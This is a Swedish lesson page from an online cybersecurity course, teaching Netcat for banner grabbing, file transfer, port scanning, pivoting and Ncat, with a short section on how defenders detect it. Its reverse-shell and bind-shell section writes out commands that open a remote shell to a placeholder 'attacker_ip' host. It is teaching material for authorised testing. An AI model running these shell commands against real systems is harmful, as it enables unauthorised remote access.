Netcat: den schweiziska armékniven
Använd nc för banneridentifiering, filöverföring, portvidarebefordran och enkla omvända skal.
Netcat: den schweiziska armékniven är en gratis lektion i Cyber Security Academy på CoddyKit. Detta är lektion 3 av 4. Du kan läsa vilka 3 lektioner som helst i den här lärvägen kostnadsfritt i sin helhet – därefter låser CoddyKit PRO upp alla lektioner, plus praktisk övning med en inbyggd kodredigerare och en AI-lärare dygnet runt. Den ingår i lärvägen för Cyber Security Academy, och Era framsteg synkroniseras mellan webben och CoddyKit-appen. Kursen i Cyber Security Academy innehåller totalt 4 lektioner.
Vad är Netcat?
Netcat (nc) är ett verktyg som läser och skriver data över nätverksanslutningar med TCP eller UDP. Det är installerat på nästan alla Unix-system och är ovärderligt för felsökning, filöverföring och grundläggande exploatering.
Grundläggande anslutning och banner grabbing
Anslut till valfri TCP-port för att hämta tjänstebannern och interagera manuellt med protokollet. Detta är den enklaste formen av rekognosering.
# Connect to port 80
nc 192.168.1.100 80
GET / HTTP/1.0
[Enter twice]
# Connect to SMTP
nc mail.example.com 25
# Returns: 220 mail.example.com ESMTPLyssna på en port
Netcat kan lyssna efter inkommande anslutningar med -l -p. Det är användbart för att testa anslutningar, fånga reverse shells och ta emot filer.
# Listen on port 4444
nc -lvnp 4444
# -l listen
# -v verbose
# -n no DNS resolution
# -p port numberFilöverföring med Netcat
Netcat kan skicka filer genom att leda dem in i en anslutning. Mottagaren lyssnar och omdirigerar utdata till en fil. Ingen kryptering — använd endast i betrodda nätverk.
# Receiver (runs first):
nc -lvnp 4444 > received_file.txt
# Sender:
nc 192.168.1.10 4444 < file_to_send.txtPortskanning med Netcat
Netcat kan utföra grundläggande portskanning med -z (läge utan I/O) och -w (timeout). Det är långsammare än Nmap men användbart när Nmap inte är tillgängligt.
# Scan ports 20-80
nc -zv 192.168.1.100 20-80 2>&1 | grep succeeded
# With timeout:
nc -zvw2 192.168.1.100 22 80 443Enkelt reverse shell
Ett reverse shell får målet att ansluta tillbaka till angriparen. Det är användbart vid penetrationstester när brandväggsregler blockerar inkommande anslutningar till målet.
# Attacker listens:
nc -lvnp 4444
# Target executes (bash):
bash -i >& /dev/tcp/attacker_ip/4444 0>&1
# Or via nc:
nc attacker_ip 4444 -e /bin/bashBind shell
Ett bind shell lyssnar på måldatorn. Angriparen ansluter till det. Det är mindre vanligt i moderna penetrationstester eftersom brandväggar vanligtvis blockerar inkommande anslutningar.
# On target: listen and serve a shell
nc -lvnp 5555 -e /bin/bash
# On attacker: connect
nc target_ip 5555UDP-läge
Använd -u för UDP-anslutningar. Det är användbart för att testa UDP-tjänster som DNS (port 53) och SNMP (port 161).
# Test DNS over UDP
nc -u 8.8.8.8 53
# Test SNMP
nc -u 192.168.1.1 161Proxying med Netcat
Netcat kan kedja anslutningar för att pivotera genom nätverk. Tillsammans med namngivna pipes (mkfifo) skapar det enkla tvåvägstunnlar utan ytterligare verktyg.
mkfifo /tmp/pipe
nc -lvnp 4445 < /tmp/pipe | nc internal_host 80 > /tmp/pipeNcat: det moderna alternativet
Ncat (en del av Nmap) utökar Netcat med SSL-stöd (--ssl), åtkomstkontroll och broker-läge. Föredra Ncat för krypterade kanaler.
# SSL listener
ncat --ssl -lvnp 4444
# SSL connect
ncat --ssl target_ip 4444Försvarare: upptäcka Netcat
Netcat-anslutningar ser ut som normala TCP-anslutningar. Försvarare upptäcker dem genom övervakning av processnamn (HIDS), ovanliga utgående portar och skal som startas från oväntade överordnade processer.
Snabbkontroll
Vilken Netcat-flagga aktiverar lyssningsläge?
Sammanfattning: Netcat
Netcat är ett grundläggande verktyg: använd det för banner grabbing, filöverföring, anslutningstester och för att förstå hur reverse shells och bind shells fungerar. Vid auktoriserade penetrationstester validerar det brandväggsregler och simulerar angripares pivotering. Lär er verktyget väl — både för att använda det och för att upptäcka det.
Lär dig Cyber Security Academy med en AI-lärare – gratis
Skriv och kör riktig kod i webbläsaren, få omedelbar hjälp av en AI-lärare dygnet runt och fortsätt där du slutade – på webben eller i appen.
- Kurser
- 76
- Lektioner
- 303
Vanliga frågor
Är lektionen ”Netcat: den schweiziska armékniven” gratis?
Ja – du kan läsa vilka 3 lektioner som helst i lärvägen Cyber Security Academy, inklusive ”Netcat: den schweiziska armékniven”, kostnadsfritt i sin helhet här på webben. Därefter låser CoddyKit PRO upp alla lektioner, plus interaktiv övning med en inbyggd kodredigerare och en AI-lärare dygnet runt. Kursen i Cyber Security Academy innehåller totalt 4 lektioner.
Vad lär jag mig i ”Netcat: den schweiziska armékniven”?
Använd nc för banneridentifiering, filöverföring, portvidarebefordran och enkla omvända skal. Ni övar på Cyber Security Academy med praktisk kod som körs direkt i webbläsaren, medan en AI-handledare som är tillgänglig dygnet runt svarar på Era frågor under lektionen.
Behöver jag någon erfarenhet för att börja lära mig Cyber Security Academy?
Du behöver inga förkunskaper. Utbildningen i Cyber Security Academy på CoddyKit är upplagd för allt från nybörjare till avancerade elever, så att du kan börja här eller från början och gå fram i din egen takt. Detta är lektion 3 av 4.
Hur lång tid tar lektionen ”Netcat: den schweiziska armékniven”?
De flesta CoddyKit-lektioner tar cirka 5–10 minuter. Varje lektion är kort och interaktiv, så att du gör stadiga framsteg och kan fortsätta precis där du slutade – på webben eller i appen.
Kan jag skriva och köra kod i den här Cyber Security Academy-lektionen?
Ja. Varje Cyber Security Academy-lektion innehåller en inbyggd kodredigerare, så att du kan skriva och köra riktig kod direkt i webbläsaren och få omedelbar AI-feedback – utan lokal installation.
Alla lektioner i den här kursen
- Tekniker för portskanning med Nmap
- Fingeravtrycksidentifiering av tjänster och operativsystem
- Netcat: den schweiziska armékniven
- Skript för nätverksenumerering